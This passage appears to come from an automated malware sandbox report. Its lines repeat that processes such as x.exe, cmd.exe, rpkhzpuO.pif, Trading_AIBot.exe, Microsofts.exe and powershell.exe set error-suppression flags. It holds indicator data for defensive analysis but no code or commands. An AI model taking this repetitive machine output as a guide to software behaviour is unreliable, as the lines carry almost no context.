                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
